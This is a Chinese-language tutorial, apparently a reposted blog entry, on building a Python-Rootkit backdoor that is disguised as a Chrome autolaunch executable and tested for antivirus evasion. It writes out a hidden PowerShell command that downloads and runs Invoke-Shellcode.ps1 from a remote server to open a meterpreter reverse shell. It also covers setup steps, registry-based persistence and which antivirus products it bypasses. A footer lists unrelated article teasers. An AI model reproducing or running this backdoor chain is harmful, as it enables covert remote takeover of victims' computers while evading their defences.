遠控免殺專題(17)-Python-Rootkit免殺

免殺能力一覽表

在這里插入圖片描述
幾點說明:

1、上表中標識 √ 說明相應殺毒軟件未檢測出病毒,也就是代表了Bypass。

2、為了更好的對比效果,大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。

3、由于本機測試時只是安裝了360全家桶和火絨,所以默認情況下360和火絨殺毒情況指的是靜態+動態查殺。360殺毒版本5.0.0.8160(2020.01.01),火絨版本5.0.34.16(2020.01.01),360安全衛士12.0.0.2002(2020.01.01)。

4、其他殺軟的檢測指標是在virustotal.com(簡稱VT)上在線查殺,所以可能只是代表了靜態查殺能力,數據僅供參考,不足以作為免殺或殺軟查殺能力的判斷指標。

5、完全不必要苛求一種免殺技術能bypass所有殺軟,這樣的技術肯定是有的,只是沒被公開,一旦公開第二天就能被殺了,其實我們只要能bypass目標主機上的殺軟就足夠了。

一、Python-Rootkit介紹

Python-Rootkit,2017年開源的一款工具,當時號稱Bypass all anti-virus,主要是對python代碼進行多次編碼,然后利用py2exe把python代碼打包成exe,其實最終執行的是powershell命令,使用了PowerSploit的Invoke-Shellcode.ps1來反彈msf的shell。

程序還添加了后門持續化的功能,大體就是10秒鐘檢測一次連接是否正常,如果連接不存在就再重連msf,另外還使用了注冊表添加了自啟動項。

原理很簡單,不過我在前期測試中浪費了很長時間。。請往下看

二、安裝Python-Rootkit

因為要使用py2exe,所以我就在windows上安裝了,如果linux上安裝了wine后不知道能不能使用py2exe,可自行測試。

1、先從官網git到本地

git clone https://github.com/0xIslamTaha/Python-Rootkit

2、修改參數

進入Python-Rootkit\viRu5文件夾

打開source.py文件,修改其中的LHOTS和LPORT,這個文件也是后門的主代碼在這里插入圖片描述
然后刪掉或重命名viRu5文件夾中原有的GoogleChromeAutoLaunch.py,把source.py改名為GoogleChromeAutoLaunch.py

3、安裝py2exe

然后還需要安裝py2exe,我已經下載好了一份python2.7的py2exe安裝文件py2exe-0.6.9.win32-py2.7.exe,下載地址https://github.com/TideSec/BypassAntiVirus/blob/master/tools/py2exe-0.6.9.win32-py2.7.exe,下載安裝即可。

4、安裝metasploit

鄭重提示:需要安裝需要4.8.2及以下的版本

如果你的msf為4.8.2以上版本,那么后門是反彈不成shell的。期間看到有人說是powershell需要32位的,還有說是需要msf生成shellcode進行配合的,眾說紛紜,然后都沒解決我的問題。

我就是在這里摸索了好長時間,才發現是msf和PowerSploit的問題,大體是msf升級到5.0后、PowerSploit升級到3.0后有些之前的功能就不大好使了。

所以后來我單獨在另一臺ubuntu上安裝了metasploit 4.8.2,下載安裝


wget https://downloads.metasploit.com/data/releases/archive/metasploit-4.8.2-linux-x64-installer.run
chmod +x metasploit-4.8.2-linux-x64-installer.run
./metasploit-4.8.2-linux-x64-installer.run

一路下一步和y確認就可以
在這里插入圖片描述

三、Python-Rootkit使用說明

Python-Rootkit使用很簡單,只要安裝好上面的插件后,執行python.exe setup.py就可以了。

經分析,整個工具的核心代碼就一句,下載Invoke-Shellcode.ps1,反彈shell。

powershell.exe  -noprofile -windowstyle hidden iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 10.211.55.7 -Lport 3333 -Force;

如果你沒成功反彈shell,如果你安裝的msf版本沒問題,那么再確認一下你的windows測試機能否連接到https://raw.githubusercontent.com,如果不行的話那肯定執行不成功的。
在這里插入圖片描述
可以在source.py中把遠程服務器換成你自己的服務器地址
在這里插入圖片描述
本地可以先測試一下,去掉-windowstyle hidden參數,可以看到ps代碼執行情況。


powershell.exe  -noprofile  iex (new-object net.webclient).downloadstring('http://10.211.55.2/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 10.211.55.7 -Lport 3333 -Force;

在這里插入圖片描述

三、利用Python-Rootkit生成后門

在生成后門前,還需要找個.ico圖標文件,放在viRu5文件夾中,這樣viRu5文件夾里需要有下面幾個文件
在這里插入圖片描述
下面就可以生成后門了

python.exe setup.py

如果前面安裝都沒問題,就會出現這個界面
在這里插入圖片描述
提示生成了后門GoogleChromeAutoLaunch.exe
在這里插入圖片描述
使用msf進行監聽windows/meterpreter/reverse_https

為什么是監聽windows/meterpreter/reverse_https?因為Invoke-Shellcode.ps1只支持windows/meterpreter/reverse_https和windows/meterpreter/reverse_http的反彈msf的shell。
在這里插入圖片描述
運行Python-Rootkit\viRu5\dist目錄下的GoogleChromeAutoLaunch.exe,可正常上線
在這里插入圖片描述
打開殺軟進行測試,靜態檢測都可bypass,行為檢測時火絨提示隱藏的powershell行為,關閉火絨后可正常上線,360安全衛士和殺毒都沒有報警。
在這里插入圖片描述

四、Python-Rootkit小結

Python-Rootkit在測試中因為msf5一直沒法上線折騰了很長時間,官方issue居然沒有反饋這個問題的,后來調試了半天發現是Invoke-Shellcode.ps1和msf的問題。

免殺效果整體感覺一般,還是python生成exe,執行后調用powershell下載Invoke-Shellcode.ps1,然后反彈shell,應該很容易觸發殺軟的行為檢測。

五、參考

官方說明:https://github.com/0xIslamTaha/Python-Rootkit

Invoke-Shellcode crash:https://github.com/PowerShellMafia/PowerSploit/issues/39

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/380124.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/380124.shtml
英文地址,請注明出處:http://en.pswp.cn/news/380124.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

項目管理軟件應用淺析(轉)

項目管理是在一定的約束條件下,以高效率地實現項目業主的目標為目的,以項目經理個人負責制為基礎和以項目為獨立實體進行經濟核算,并按照項目內在的邏輯規律進行有效的計劃、組織、協調、控制的系統管理活動。項目管理的核心技術是網絡計劃技…

斜視角的討論(轉)

http://school.ogdev.net/listshow.asp?page4&typeid0&categoryid5&id0&ListType2 目 錄 1.1 地圖和地表 1.2 斜視角游戲中的視角 1.3 Tile圖片的拼接 1.4 不同地表間的過渡 1.5 地圖數據結構的定義 --------------------------------------------------…

計算機網絡(湖科大教書匠)

計算機網絡(湖科大教書匠) 本文檔為教學視頻【計算機網絡微課堂(有字幕無背景音樂版)_嗶哩嗶哩_bilibili】的摘錄 目錄計算機網絡(湖科大教書匠)一、緒論1.2 因特網概述1.2.1 網絡、互連網(互聯…

經緯度

題目描述 給定地球的兩個經緯度坐標,問這兩個點的直線距離。假設地球為球體,半徑為6371009米。 輸入描述: 第一行一個整數T表示數據組數。 接下來n行,每行四個數lat1, lng1, lat2, lng2分別表示兩個點的經緯度。 正數表示北緯和東經。 …

遠控免殺專題(18)-ASWCrypter免殺

免殺能力一覽表 幾點說明: 1、上表中標識 √ 說明相應殺毒軟件未檢測出病毒,也就是代表了Bypass。 2、為了更好的對比效果,大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。 3、由于本機測試時只是安裝了360全家桶…

Hibernate 筆記4 實現對數據庫的增刪改查

1 準備 首先在mysql數據庫中建表User,并添加相關信息。 user表結構如下。 ---------------------------------------------------------| Field | Type | Null | Key | Default | Extra |------------------------------------------------…

Direct3D中的繪制(3)

立方體——只比三角形稍微復雜一點,這個程序渲染一個線框立方體。 這個簡單的繪制和渲染立方體的程序的運行結果如下圖所示: 源程序: /************************************************************************************** Renders a …

遠控免殺專題(19)-nps_payload免殺

免殺能力一覽表 幾點說明: 1、上表中標識 √ 說明相應殺毒軟件未檢測出病毒,也就是代表了Bypass。 2、為了更好的對比效果,大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。 3、由于本機測試時只是安裝了360全家桶…

VS2005中使用WebDeploymentProject的問題

近來做Web項目,VS2005中發布網站時默認發布大批的程序集,這給升級網站時造成很大麻煩,所以偶從MS下載了個WebDeploymentProject的插件(下載地址http://download.microsoft.com/download/c/c/b/ccb4877f-55f7-4478-8f16-e41886607a…

操作系統中的多級隊列調度

多級隊列調度 (Multilevel queue scheduling) Every algorithm supports a different class of process but in a generalized system, some process wants to be scheduled using a priority algorithm. While some process wants to remain in the system (interactive proce…

編寫一程序,輸入一個字符串,查找該字符串中是否包含“abc”。

import java.lang.String.*;//這里調用java.long.String.contains()方法; import java.util.Scanner; public class shit {public static void main(String[] args) {Scanner wsq new Scanner(System.in);String str wsq.next();boolean status str.contains(&qu…

顯示消息提示對話框(WebForm)

1: /// <summary>2: /// 顯示消息提示對話框。3: /// Copyright (C) Maticsoft4: /// </summary>5: public class MessageBox6: { 7: private MessageBox()8: { 9: }10: 11: …

借助格式化輸出過canary保護

0x01 canary保護機制 棧溢出保護是一種緩沖區溢出攻擊緩解手段&#xff0c;當函數存在緩沖區溢出攻擊漏洞時&#xff0c;攻擊者可以覆蓋棧上的返回地址來讓shellcode能夠得到執行。當啟用棧保護后&#xff0c;函數開始執行的時候會先往棧里插入cookie信息&#xff0c;當函數真…

什么叫灰度圖

任何顏色都有紅、綠、藍三原色組成&#xff0c;假如原來某點的顏色為RGB(R&#xff0c;G&#xff0c;B)&#xff0c;那么&#xff0c;我們可以通過下面幾種方法&#xff0c;將其轉換為灰度&#xff1a; 1.浮點算法&#xff1a;GrayR*0.3G*0.59B*0.11 2.整數方法&#xff1a;Gra…

各抓包軟件的之間差異_系統軟件和應用程序軟件之間的差異

各抓包軟件的之間差異什么是軟件&#xff1f; (What is Software?) Software is referred to as a set of programs that are designed to perform a well-defined function. A program is a particular sequence of instructions written to solve a particular problem. 軟件…

輸入一字符串,統計其中有多少個單詞(單詞之間用空格分隔)(java)

import java.util.*; class Example3{public static void main(String args[]){Scanner sc new Scanner(System.in);String s sc.nextLine();//這里的sc.nextLine&#xff08;&#xff09;空格也會記數&#xff1b;StringTokenizer st new StringTokenizer(s," ")…

為何苦命干活的人成不了專家?

所謂熟能生巧&#xff0c;但離專家卻有一個巨大的鴻溝&#xff0c;在農田干活的農民怎么也成不了水稻專家&#xff0c;推廣之&#xff0c;那些在本職工作上勤勤懇懇的人&#xff0c;在業務上總有一個不可沖破的瓶頸。 這種現象非常普遍&#xff0c;這就是為什么很多人很勤奮&am…

今天發布一個新網站www.heijidi.com

新網站發布了&#xff0c;歡迎訪問&#xff0c;關于國產機的 網站 www.heijidi.com 轉載于:https://www.cnblogs.com/liugod/archive/2008/03/26/1122753.html

ret2shellcdoe

ret2shellcode的關鍵是找到一個緩沖區&#xff0c;這個緩沖區是可讀寫寫可執行的&#xff0c;我們要想辦法把我們的shellcdoe放到這個緩沖區&#xff0c;然后跳轉到我們的shellcode處執行。 例子&#xff1a; #include <stdio.h> #include <string.h> char str1[…

stl取出字符串中的字符_從C ++ STL中的字符串訪問字符元素

stl取出字符串中的字符字符串作為數據類型 (String as datatype) In C, we know string basically a character array terminated by \0. Thus to operate with the string we define character array. But in C, the standard library gives us the facility to use the strin…